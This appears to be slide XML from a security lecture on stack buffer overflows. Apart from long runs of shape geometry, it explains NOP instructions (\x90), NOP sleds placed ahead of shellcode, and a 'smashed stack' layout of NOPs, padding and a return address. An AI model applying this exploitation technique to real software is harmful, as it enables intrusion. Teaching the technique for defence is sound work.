              <a:rPr i="1" lang="en-US"/>
              <a:t>nothing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Used for timing purposes as it consumes one processor cycle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4 real world seconds = 5000000 NOPs on a 1MHz processor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Hex value “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\x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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can increase our odds of finding our shellcode address by making our payload larger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NOP Sled: Appending a lot of NOPs at the front of our shellcode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The Return address can point </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>anywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in the NOP sled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="643" name="Google Shape;643;g24e5311e72c_0_522"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9747250" y="1377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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1488450"/>
              </a:tblGrid>
              <a:tr h="203200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20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Uber Smashed Stack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NOP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NOP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NOP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NOP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3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NOP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NOP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NOP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NOP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NOP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 Address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AAAA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AAAA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AAAA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  <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="644" name="Google Shape;644;g24e5311e72c_0_522"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11272684" y="2626338"/>
            <a:ext cx="462115" cy="2289175"/>
            <a:chOff x="8300884" y="2016738"/>
            <a:chExt cx="462115" cy="2289175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="645" name="Google Shape;645;g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8300884" y="3938586"/>
              <a:ext cx="227965" cy="367029"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="367029" w="227965">
                  <a:moveTo>
                    <a:pt x="227782" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221237" y="56719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208672" y="109661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190658" y="158055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167763" y="201125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140556" y="238100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109607" y="268205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75485" y="290666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38760" y="304710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="309563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="366713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6447" y="366713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12893" y="366309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56012" y="356458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90330" y="339295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121841" y="314764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150116" y="283620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174726" y="246614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195242" y="204499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211235" y="158028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222275" y="107952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227934" y="55025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227782" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8300884" y="3554036"/>
              <a:ext cx="228600" cy="751839"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="751839" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="413125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225372" y="356368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="302340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="251937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="206058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="131460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93495" y="104535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="28574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93495" y="47386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="74310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="108450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="148909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="194788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="245191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225372" y="299219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228599" y="355975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="413125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225608" y="467972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216945" y="520002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203084" y="568518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184493" y="612824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161644" y="652224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135008" y="686022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105054" y="713520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72255" y="734024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="751263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="694113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38760" y="689259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75486" y="675215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109608" y="652754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140557" y="622649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167763" y="585674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190658" y="542603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208673" y="494210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221237" y="441267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227782" y="384550"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8445850" y="2691649"/>
              <a:ext cx="228600" cy="1614170"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1614170" w="228600">
                  <a:moveTo>
                    <a:pt x="228312" y="814190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="226660" y="881482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222965" y="952073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217449" y="1020265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210205" y="1085761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201322" y="1148261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190892" y="1207471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179005" y="1263091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165752" y="1314825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151224" y="1362376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135512" y="1405446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118706" y="1443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82178" y="1504798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42367" y="1543178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1556500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1613650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2805" y="1613650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5610" y="1613475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49342" y="1595489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87600" y="1554620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122566" y="1492787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138621" y="1454720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153620" y="1412264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167485" y="1365703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180139" y="1315321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191504" y="1261402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201502" y="1204230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210056" y="1144089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217089" y="1081263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222521" y="1016036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226276" y="948692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228277" y="879514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228377" y="837363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228312" y="814190"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="1614170" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="808788"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="228445" y="808788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228413" y="822296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="837363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="808788"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="1614170" w="228600">
                  <a:moveTo>
                    <a:pt x="101743" y="85725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75708" y="104860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93495" y="128911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="190723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141638" y="227970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="269101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168800" y="313859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="361985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191465" y="413222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="467313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209164" y="524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="583026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221426" y="644133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225372" y="707063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227783" y="771559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228312" y="814190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228445" y="808788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="808788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228492" y="771559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227783" y="714409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225372" y="649913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221426" y="586983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="525876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209164" y="466851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="410164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191465" y="356073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="304835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168800" y="256709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="211952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141638" y="170821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="133574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110451" y="100468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101743" y="85725"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="1614170" w="228600">
                  <a:moveTo>
                    <a:pt x="57150" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="32500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101743" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93495" y="71761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75708" y="47711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="285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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8445850" y="3500437"/>
              <a:ext cx="228600" cy="805179"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="805179" w="228600">
                  <a:moveTo>
                    <a:pt x="228445" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="226660" y="72694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222965" y="143285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217449" y="211477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210205" y="276972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201322" y="339473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190892" y="398682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179005" y="454303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165752" y="506037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151224" y="553588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135512" y="596658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118706" y="634949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82178" y="696010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42367" y="734390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="747712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="804862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2805" y="804862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5610" y="804687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49342" y="786701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87600" y="745832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122566" y="683999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138621" y="645932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153620" y="603476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167485" y="556915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180139" y="506533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191504" y="452614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201502" y="395442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210056" y="335301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217089" y="272475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222521" y="207248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226276" y="139904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228277" y="70726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228445" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8445850" y="2691649"/>
              <a:ext cx="228600" cy="1614170"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1614170" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="837362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227783" y="771558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225372" y="707062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221426" y="644132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="583026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209164" y="524000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="467313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191465" y="413222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="361985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168800" y="313858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="269101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141639" y="227970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126519" y="190723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93495" y="128911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="32500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="28575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75708" y="47711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110451" y="100468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141639" y="170821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155752" y="211952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168800" y="256709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180724" y="304835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191465" y="356073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200964" y="410164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209164" y="466851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216004" y="525876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221426" y="586983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225372" y="649913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227783" y="714409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228599" y="780213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="837362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227665" y="908020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224916" y="976901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220434" y="1043730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214298" y="1108234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206589" y="1170139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197389" y="1229169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186777" y="1285053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174836" y="1337515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161644" y="1386281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147284" y="1431077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131835" y="1471629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115378" y="1507664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79765" y="1565084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41091" y="1601143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1613650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1556500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21458" y="1553120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42367" y="1543178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82178" y="1504798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118706" y="1443738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135511" y="1405446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151224" y="1362376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165751" y="1314825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179004" y="1263091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190891" y="1207471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201322" y="1148261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210205" y="1085760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217449" y="1020265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222965" y="952073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226660" y="881481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228445" y="808787"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25375">
              <a:solidFill>
                <a:srgbClr val="0AD4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g24e5311e72c_0_522"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8534399" y="2016738"/>
              <a:ext cx="228600" cy="2289175"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2289175" w="228600">
                  <a:moveTo>
                    <a:pt x="228456" y="1146500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227623" y="1215980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225731" y="1289723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222882" y="1361873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219108" y="1432272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214442" y="1500764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208917" y="1567192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202566" y="1631400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195422" y="1693230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187517" y="1752527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178884" y="1809133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169557" y="1862892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159567" y="1913648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148948" y="1961243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137733" y="2005521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125955" y="2046325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113645" y="2083500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87565" y="2146331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59756" y="2192763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30480" y="2221540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2231411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2288561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945" y="2288561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3891" y="2288439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49995" y="2261685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77771" y="2222126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103941" y="2166471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128272" y="2095928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139674" y="2055452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150529" y="2011708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160806" y="1964847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170476" y="1915020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179510" y="1862379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187880" y="1807074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195554" y="1749257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202505" y="1689079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208702" y="1626690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214116" y="1562244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218719" y="1495890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222480" y="1427779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225371" y="1358064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227361" y="1286894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228399" y="1215980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228456" y="1146500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="2289175" w="228600">
                  <a:moveTo>
                    <a:pt x="228600" y="1140799"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="228600" y="1169374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="1140799"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="2289175" w="228600">
                  <a:moveTo>
                    <a:pt x="90863" y="85725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57150" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70721" y="105071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83892" y="128218"/>
